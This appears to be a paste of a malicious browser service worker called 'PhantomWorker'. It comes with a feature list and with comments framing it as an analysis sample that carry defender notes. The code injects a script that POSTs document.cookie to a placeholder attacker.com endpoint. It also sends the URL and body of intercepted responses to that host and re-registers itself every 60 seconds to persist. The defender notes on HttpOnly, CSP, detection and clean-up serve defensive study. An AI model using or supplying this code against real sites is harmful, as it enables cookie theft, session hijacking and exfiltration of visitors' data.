xosski

PhantomWorker

Mar 27th, 2025
  1. 1. Malicious Payload Injection
  2. • Injects a script into HTML responses that stealthily exfiltrates cookies:
  3.  
  4. <script>fetch('https://attacker.com/exfil', {method: 'POST', body: document.cookie});</script>
  5.  
  6. Appends the payload before </body> to ensure execution.
  7.  
  8. 2. Fetch Hijacking for Data Exfiltration
  9. • Every intercepted request is analyzed.
  10. • If the request's hostname is not google.com, the service worker logs and exfiltrates data.
  11. • Sends exfiltrated request URL & response content to https://attacker.com/exfil.
  12.  
  13. 3. Service Worker Hijacking & Persistence
  14. • Persists itself by:
  15. • Forcing reinstallation every 60 seconds.
  16. • Re-registering the service worker even if removed manually.
  17.  
  18. How This Works
  19. 1. The service worker intercepts fetch requests.
  20. 2. If the request is for an HTML page, it injects malicious JavaScript.
  21. 3. If the request contains sensitive data, it exfiltrates it.
  22. 4. The service worker auto-reinstalls every 60 seconds.
  23.  
  (function(){
    'use strict';

    /**
     * Modified Service Worker for MITM & Hijacking
     * Injects payloads, modifies cache, and enables persistence
     *
     * Reviewer summary (analysis sample). As written, the script is meant to:
     *   1. rewrite HTML responses so they carry an inline <script> that POSTs
     *      document.cookie to EXFIL_URL;
     *   2. forward the URL and body text of GET/POST responses to EXFIL_URL;
     *   3. take over open pages right away (skipWaiting + clients.claim);
     *   4. schedule a registration attempt for '/sw.js' every 60 seconds.
     *
     * Defender notes:
     *   - Cookies set with HttpOnly are not exposed through document.cookie,
     *     so the injected script cannot read them.
     *   - The rewritten response reuses the original response headers, so a
     *     Content-Security-Policy sent by the site still applies to the page;
     *     a policy that disallows inline scripts blocks the injected tag.
     *   - A service worker script has to be served from the site's own origin,
     *     so finding one like this means something could place or serve a
     *     script there; that entry point is the root cause to investigate.
     *   - Detection: unexpected entries in the browser's service worker list,
     *     server log lines for script requests carrying the
     *     `Service-Worker: script` request header on paths the site never
     *     deployed, and outbound POSTs to unfamiliar hosts.
     *   - Clean-up: remove the script at the source and send
     *     `Clear-Site-Data: "storage"` so browsers drop the registration.
     */

    // Inline script the worker inserts into HTML; it POSTs document.cookie to the
    // collection endpoint. 'attacker.com' is the sample's placeholder host.
    const MALICIOUS_PAYLOAD = `<script>fetch('https://attacker.com/exfil', {method: 'POST', body: document.cookie});</script>`;
    // Collection endpoint used by the fetch handler below (placeholder value).
    const EXFIL_URL = 'https://attacker.com/exfil';

    /**
     * Hijack & Modify Responses
     *
     * Takes a Response and, when its Content-Type contains "text/html",
     * returns a new Response whose body has MALICIOUS_PAYLOAD inserted in
     * front of the first "</body>" (String.replace with a string pattern
     * only touches the first match). Status, statusText and headers are
     * copied from the clone. Any other content type, or any error, yields
     * the original response; errors are only logged.
     */
    async function hijackResponse(originalResponse) {
      try {
        const clonedResponse = originalResponse.clone();
        const contentType = clonedResponse.headers.get("Content-Type");

        if (contentType && contentType.includes("text/html")) {
          const text = await clonedResponse.text();
          const modifiedText = text.replace("</body>", MALICIOUS_PAYLOAD + "</body>");
          return new Response(modifiedText, {
            status: clonedResponse.status,
            statusText: clonedResponse.statusText,
            headers: clonedResponse.headers
          });
        }
      } catch (err) {
        console.error("Hijack Error:", err);
      }
      return originalResponse;
    }

    /**
     * Hijack Fetch Event
     *
     * Handles only GET and POST requests; for any other method respondWith
     * is never called, so the browser performs the request as usual.
     * The hostname test is an exact comparison with 'google.com'.
     */
    self.addEventListener('fetch', async event => {
      const url = new URL(event.request.url);

      // Forwards every handled request to the network, then posts the
      // request URL and response text to EXFIL_URL as JSON (not awaited).
      // This outbound POST is the clearest network indicator of the sample.
      if (event.request.method === 'POST' || event.request.method === 'GET') {
        event.respondWith(fetch(event.request.clone()).then(async response => {
          if (url.hostname !== 'google.com') {
            fetch(EXFIL_URL, {
              method: 'POST',
              headers: { 'Content-Type': 'application/json' },
              body: JSON.stringify({ url: event.request.url, data: await response.text() })
            });
          }
          return hijackResponse(response);
        }));
      }
    });

    /**
     * Service Worker Hijacking & Persistence
     *
     * skipWaiting() lets a newly installed worker activate without waiting
     * for pages using an older worker to close; clients.claim() makes the
     * active worker control pages that are already open within its scope.
     * Together they remove the usual delay before a new worker takes effect.
     */
    self.addEventListener('install', event => {
      event.waitUntil(self.skipWaiting());
    });

    self.addEventListener('activate', event => {
      event.waitUntil(self.clients.claim());
    });

    /**
     * Persistence: Auto-Reinstall & Clone
     *
     * Attempts to register '/sw.js' through navigator.serviceWorker and
     * logs any failure to the console instead of propagating it.
     */
    async function persistSW() {
      try {
        await navigator.serviceWorker.register('/sw.js');
      } catch (err) {
        console.error("Persistence Error:", err);
      }
    }

    // Schedules persistSW every 60000 ms for as long as this script context is alive.
    setInterval(() => persistSW(), 60000);
  })();